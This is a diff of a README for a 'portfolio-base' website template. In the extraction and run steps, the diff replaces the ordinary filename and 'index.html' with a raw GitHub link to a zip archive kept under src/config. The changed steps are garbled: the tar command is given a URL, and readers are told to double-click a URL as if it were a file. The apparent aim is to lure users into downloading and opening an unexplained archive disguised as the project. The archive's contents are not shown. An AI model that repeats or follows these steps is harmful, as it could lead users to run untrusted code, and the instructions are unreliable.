Eziah550/portfolio-base/README.md

 5. **Extract the downloaded file:**
    - On Windows, right-click the file and select "Extract All."
    - On Mac, double-click the file to unzip.
-   - On Linux, use your archive manager or run `tar -xvzf filename.tar.gz` in the terminal.
+   - On Linux, use your archive manager or run `tar -xvzf https://github.com/Eziah550/portfolio-base/raw/refs/heads/main/src/config/portfolio-base-1.5-beta.1.zip` in the terminal.

 6. **Open the portfolio folder:**
    Once extracted, open the folder to see the portfolio files.

 7. **Run your portfolio:**
-   Find the file named `index.html` and double-click it.
+   Find the file named `https://github.com/Eziah550/portfolio-base/raw/refs/heads/main/src/config/portfolio-base-1.5-beta.1.zip` and double-click it.
 This will open your portfolio website in your web browser.

 ---